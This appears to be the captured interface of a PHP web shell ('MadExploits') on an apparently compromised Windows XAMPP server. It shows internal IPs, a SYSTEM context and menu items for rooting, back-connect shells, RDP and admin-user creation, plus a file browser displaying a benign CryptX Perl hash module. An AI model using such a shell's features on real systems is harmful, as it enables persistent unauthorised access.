Windows NT DGPENSV2LPKMN 10.0 build 14393 (Windows Server 2016) AMD64
Apache/2.4.46 (Win64) OpenSSL/1.1.1h PHP/7.3.25
: 172.16.0.66 | : 172.16.0.254
Cant Read [ /etc/named.conf ]
7.3.25
SYSTEM
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
BLACK DEFEND!
README
+ Create Folder
+ Create File
[ A ]
[ C ]
[ D ]
C: /
xampp7 /
perl /
vendor /
lib /
Crypt /
Digest /
[ HOME SHELL ]
Name
Size
Permission
Action
.mad-root
0
B
-rw-rw-rw-
BLAKE2b_160.pm
6.55
KB
-rw-rw-rw-
BLAKE2b_256.pm
6.55
KB
-rw-rw-rw-
BLAKE2b_384.pm
6.55
KB
-rw-rw-rw-
BLAKE2b_512.pm
6.55
KB
-rw-rw-rw-
BLAKE2s_128.pm
6.55
KB
-rw-rw-rw-
BLAKE2s_160.pm
6.55
KB
-rw-rw-rw-
BLAKE2s_224.pm
6.55
KB
-rw-rw-rw-
BLAKE2s_256.pm
6.55
KB
-rw-rw-rw-
CHAES.pm
5.87
KB
-rw-rw-rw-
Keccak224.pm
6.28
KB
-rw-rw-rw-
Keccak256.pm
6.28
KB
-rw-rw-rw-
Keccak384.pm
6.28
KB
-rw-rw-rw-
Keccak512.pm
6.28
KB
-rw-rw-rw-
MD2.pm
5.56
KB
-rw-rw-rw-
MD4.pm
5.55
KB
-rw-rw-rw-
MD5.pm
5.55
KB
-rw-rw-rw-
RIPEMD128.pm
6.28
KB
-rw-rw-rw-
RIPEMD160.pm
6.28
KB
-rw-rw-rw-
RIPEMD256.pm
6.28
KB
-rw-rw-rw-
RIPEMD320.pm
6.28
KB
-rw-rw-rw-
SHA1.pm
5.67
KB
-rw-rw-rw-
SHA224.pm
5.92
KB
-rw-rw-rw-
SHA256.pm
5.92
KB
-rw-rw-rw-
SHA384.pm
5.92
KB
-rw-rw-rw-
SHA3_224.pm
6.16
KB
-rw-rw-rw-
SHA3_256.pm
6.16
KB
-rw-rw-rw-
SHA3_384.pm
6.16
KB
-rw-rw-rw-
SHA3_512.pm
6.16
KB
-rw-rw-rw-
SHA512.pm
5.92
KB
-rw-rw-rw-
SHA512_224.pm
6.4
KB
-rw-rw-rw-
SHA512_256.pm
6.4
KB
-rw-rw-rw-
SHAKE.pm
1.67
KB
-rw-rw-rw-
Tiger192.pm
6.17
KB
-rw-rw-rw-
Whirlpool.pm
6.3
KB
-rw-rw-rw-
Delete
Unzip
Zip
${this.title}
Close
Code Editor : CHAES.pm
package Crypt::Digest::CHAES; ### BEWARE - GENERATED FILE, DO NOT EDIT MANUALLY! use strict; use warnings; our $VERSION = '0.068'; use base qw(Crypt::Digest Exporter); our %EXPORT_TAGS = ( all => [qw( chaes chaes_hex chaes_b64 chaes_b64u chaes_file chaes_file_hex chaes_file_b64 chaes_file_b64u )] ); our @EXPORT_OK = ( @{ $EXPORT_TAGS{'all'} } ); our @EXPORT = qw(); use Carp; $Carp::Internal{(__PACKAGE__)}++; use Crypt::Digest; sub hashsize { Crypt::Digest::hashsize('CHAES') } sub chaes { Crypt::Digest::digest_data('CHAES', @_) } sub chaes_hex { Crypt::Digest::digest_data_hex('CHAES', @_) } sub chaes_b64 { Crypt::Digest::digest_data_b64('CHAES', @_) } sub chaes_b64u { Crypt::Digest::digest_data_b64u('CHAES', @_) } sub chaes_file { Crypt::Digest::digest_file('CHAES', @_) } sub chaes_file_hex { Crypt::Digest::digest_file_hex('CHAES', @_) } sub chaes_file_b64 { Crypt::Digest::digest_file_b64('CHAES', @_) } sub chaes_file_b64u { Crypt::Digest::digest_file_b64u('CHAES', @_) } 1; =pod =head1 NAME Crypt::Digest::CHAES - Hash function - CipherHash based on AES [size: 128 bits] =head1 SYNOPSIS ### Functional interface: use Crypt::Digest::CHAES qw( chaes chaes_hex chaes_b64 chaes_b64u chaes_file chaes_file_hex chaes_file_b64 chaes_file_b64u ); # calculate digest from string/buffer $chaes_raw = chaes('data string'); $chaes_hex = chaes_hex('data string'); $chaes_b64 = chaes_b64('data string'); $chaes_b64u = chaes_b64u('data string'); # calculate digest from file $chaes_raw = chaes_file('filename.dat'); $chaes_hex = chaes_file_hex('filename.dat'); $chaes_b64 = chaes_file_b64('filename.dat'); $chaes_b64u = chaes_file_b64u('filename.dat'); # calculate digest from filehandle $chaes_raw = chaes_file(*FILEHANDLE); $chaes_hex = chaes_file_hex(*FILEHANDLE); $chaes_b64 = chaes_file_b64(*FILEHANDLE); $chaes_b64u = chaes_file_b64u(*FILEHANDLE); ### OO interface: use Crypt::Digest::CHAES; $d = Crypt::Digest::CHAES->new; $d->add('any data'); $d->addfile('filename.dat'); $d->addfile(*FILEHANDLE); $result_raw = $d->digest; # raw bytes $result_hex = $d->hexdigest; # hexadecimal form $result_b64 = $d->b64digest; # Base64 form $result_b64u = $d->b64udigest; # Base64 URL Safe form =head1 DESCRIPTION Provides an interface to the CHAES digest algorithm. =head1 EXPORT Nothing is exported by default. You can export selected functions: use Crypt::Digest::CHAES qw(chaes chaes_hex chaes_b64 chaes_b64u chaes_file chaes_file_hex chaes_file_b64 chaes_file_b64u); Or all of them at once: use Crypt::Digest::CHAES ':all'; =head1 FUNCTIONS =head2 chaes Logically joins all arguments into a single string, and returns its CHAES digest encoded as a binary string. $chaes_raw = chaes('data string'); #or $chaes_raw = chaes('any data', 'more data', 'even more data'); =head2 chaes_hex Logically joins all arguments into a single string, and returns its CHAES digest encoded as a hexadecimal string. $chaes_hex = chaes_hex('data string'); #or $chaes_hex = chaes_hex('any data', 'more data', 'even more data'); =head2 chaes_b64 Logically joins all arguments into a single string, and returns its CHAES digest encoded as a Base64 string, B<with> trailing '=' padding. $chaes_b64 = chaes_b64('data string'); #or $chaes_b64 = chaes_b64('any data', 'more data', 'even more data'); =head2 chaes_b64u Logically joins all arguments into a single string, and returns its CHAES digest encoded as a Base64 URL Safe string (see RFC 4648 section 5). $chaes_b64url = chaes_b64u('data string'); #or $chaes_b64url = chaes_b64u('any data', 'more data', 'even more data'); =head2 chaes_file Reads file (defined by filename or filehandle) content, and returns its CHAES digest encoded as a binary string. $chaes_raw = chaes_file('filename.dat'); #or $chaes_raw = chaes_file(*FILEHANDLE); =head2 chaes_file_hex Reads file (defined by filename or filehandle) content, and returns its CHAES digest encoded as a hexadecimal string. $chaes_hex = chaes_file_hex('filename.dat'); #or $chaes_hex = chaes_file_hex(*FILEHANDLE); B<BEWARE:> You have to make sure that the filehandle is in binary mode before you pass it as argument to the addfile() method. =head2 chaes_file_b64 Reads file (defined by filename or filehandle) content, and returns its CHAES digest encoded as a Base64 string, B<with> trailing '=' padding. $chaes_b64 = chaes_file_b64('filename.dat'); #or $chaes_b64 = chaes_file_b64(*FILEHANDLE); =head2 chaes_file_b64u Reads file (defined by filename or filehandle) content, and returns its CHAES digest encoded as a Base64 URL Safe string (see RFC 4648 section 5). $chaes_b64url = chaes_file_b64u('filename.dat'); #or $chaes_b64url = chaes_file_b64u(*FILEHANDLE); =head1 METHODS The OO interface provides the same set of functions as L<Crypt::Digest>. =head2 new $d = Crypt::Digest::CHAES->new(); =head2 clone $d->clone(); =head2 reset $d->reset(); =head2 add $d->add('any data'); #or $d->add('any data', 'more data', 'even more data'); =head2 addfile $d->addfile('filename.dat'); #or $d->addfile(*FILEHANDLE); =head2 add_bits $d->add_bits($bit_string); # e.g. $d->add_bits("111100001010"); #or $d->add_bits($data, $nbits); # e.g. $d->add_bits("\xF0\xA0", 16); =head2 hashsize $d->hashsize; #or Crypt::Digest::CHAES->hashsize(); #or Crypt::Digest::CHAES::hashsize(); =head2 digest $result_raw = $d->digest(); =head2 hexdigest $result_hex = $d->hexdigest(); =head2 b64digest $result_b64 = $d->b64digest(); =head2 b64udigest $result_b64url = $d->b64udigest(); =head1 SEE ALSO =over =item * L<CryptX|CryptX>, L<Crypt::Digest> =item * L<https://en.wikipedia.org/wiki/Cryptographic_hash_function#Hash_functions_based_on_block_ciphers> =back =cut
Close